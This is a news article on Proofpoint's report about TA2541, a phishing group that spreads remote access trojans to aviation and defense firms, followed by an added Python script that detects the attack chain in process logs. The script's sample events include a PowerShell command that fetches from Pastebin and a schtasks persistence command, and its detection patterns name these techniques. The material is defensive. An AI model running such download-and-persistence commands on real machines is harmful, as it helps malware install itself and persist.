Dubbed TA2541 by Proofpoint researchers, the group has been attacking targets in several critical industries since 2017 with phishing emails and cloud-hosted malware droppers.
Security researchers at Proofpoint have announced their discovery of a common threat actor behind attacks reported by Cisco Talos, Microsoft and others, and they say that the group has been active since at least 2017.
Proofpoint said the individual or group it has dubbed TA2541 has mostly been attempting to infect targets in the aviation, aerospace, transportation and defense industries with remote access trojans (RATs).
“Typically, its malware campaigns include hundreds to thousands of messages. … Campaigns impact hundreds of organizations globally, with recurring targets in North America, Europe and the Middle East. Messages are nearly always in English,” the report said.
Proofpoint noted that, even though TA2541 uses commodity malware that can be purchased on the Dark Web or copied from open-source sites, it shows little variation in its campaigns. Other threat actors that use commodity malware, Proofpoint said, tend to use current events, news items and other hot topics to lure targets.
Because it operates at massive volume, uses commodity malware and has considerable command-and-control infrastructure, Proofpoint said it believes TA2541 “is a cybercriminal threat actor,” and not just a small-time operation.
How TA2541 attacks its targets
Aside from a brief adoption of COVID-19 themed phishing emails, TA2541 has maintained a steady course of targeting organizations through emails requesting quotes for aeronautical parts, ambulatory flights and other specific targets. Even its COVID messages maintained the aerospace theme, with one message featured in the report looking for a quote for a PPE shipment.
Files containing malicious scripts that download malware are a common technique, and Proofpoint said that TA2541 has used that method in past campaigns. More recent campaigns, Proofpoint said, have been using URLs that reach out to a Google Drive file with an obfuscated VBS file.
That file, in turn, makes PowerShell pull an executable from a text file hosted on sites like Pastebin. The executable then uses PowerShell to get into Windows processes, collects information, attempts to disable security software and then downloads the RAT itself.
In addition to using public cloud services like Google Drive and OneDrive, TA2541 has also been spotted using Discord URLs that link to compressed files that download one of two commodity malware families: AgentTesla or Imminent Monitor.
TA2541 is able to make itself persistent by adding scheduled tasks and registry entries, and despite using a variety of commodity malware, Proofpoint said its attack chain is always the same. The end result is similar as well: TA2541 gets the ability to remotely control infected machines.
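Because the chain described above is always the same (a VBS script host launching PowerShell, PowerShell fetching from a paste site, then scheduled-task or registry persistence), defenders can correlate those stages per host in process-creation logs. The following is an added example, not code from Proofpoint's report; the event fields, host names, command lines and the paste-site watch list are constructed assumptions.

```python
import re
from collections import defaultdict

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}  # Windows hosts that execute .vbs files
PASTE_SITES = re.compile(r"https?://(?:www\.)?pastebin\.com/")  # assumed watch list
PERSIST = re.compile(r"\bschtasks(?:\.exe)?\s+/create\b|\breg(?:\.exe)?\s+add\b")
CHAIN = {"script_to_powershell", "paste_fetch", "persistence"}

# Constructed process-creation events (not real telemetry, not from the report).
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent": "explorer.exe", "image": "wscript.exe",
     "cmd": r'wscript.exe "C:\Users\a\Downloads\quote_request.vbs"'},
    {"host": "ws-01", "parent": "wscript.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -NoProfile -Command Invoke-WebRequest https://pastebin.com/raw/EXAMPLE"},
    {"host": "ws-01", "parent": "powershell.exe", "image": "schtasks.exe",
     "cmd": r"schtasks.exe /create /tn ExampleTask /tr C:\Users\a\example.exe /sc onlogon"},
    {"host": "ws-02", "parent": "cmd.exe", "image": "schtasks.exe",
     "cmd": r"schtasks.exe /create /tn Backup /tr C:\Tools\backup.cmd /sc daily"},
    {"host": "ws-03", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell.exe Invoke-WebRequest https://pastebin.com/raw/EXAMPLE"},
]

def stages(event):
    """Return the set of chain stages a single event matches (may be empty)."""
    parent, image, cmd = (event[k].lower() for k in ("parent", "image", "cmd"))
    found = set()
    if image == "powershell.exe":
        if parent in SCRIPT_HOSTS:          # VBS script host launching PowerShell
            found.add("script_to_powershell")
        if PASTE_SITES.search(cmd):         # PowerShell pulling content from a paste site
            found.add("paste_fetch")
    if parent == "powershell.exe" and PERSIST.search(cmd):
        found.add("persistence")            # scheduled task or registry entry created
    return found

def stage_report(events):
    """Map each host to the union of stages seen on it (order is not enforced)."""
    seen = defaultdict(set)
    for ev in events:
        seen[ev["host"]] |= stages(ev)
    return dict(seen)

def hosts_matching_chain(events):
    """Hosts where every stage was observed; a single stage alone is a weak signal."""
    return sorted(h for h, s in stage_report(events).items() if CHAIN <= s)

if __name__ == "__main__":
    print(hosts_matching_chain(SAMPLE_EVENTS))
```

Hosts that show only one stage, such as a lone paste-site fetch, appear in `stage_report` for triage but are not reported as matching the full chain.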
How to avoid becoming a TA2541 victim
One of the more concerning things about TA2541 campaigns is that they cast an incredibly wide net that Proofpoint said doesn’t appear to target people with specific roles and functions. This means anyone in the thousands of organizations it has targeted could be an ingress point.
“Proofpoint assesses with high confidence this threat actor will continue using the same tactics, techniques and procedures observed in historic activity with minimal change to its lure themes, delivery and installation,” the report said.
Like other campaigns launched via phishing attacks, TA2541’s methods require a human to make a mistake. The best way to combat those sorts of mistakes is by training people to recognize suspicious emails and messages, as well as having proper anti-phishing security tools in place that can step in when mistakes inevitably occur.
Included in Proofpoint’s report are C2, VBS hash and ET signature indicators of compromise that security teams should be sure their systems are able to detect.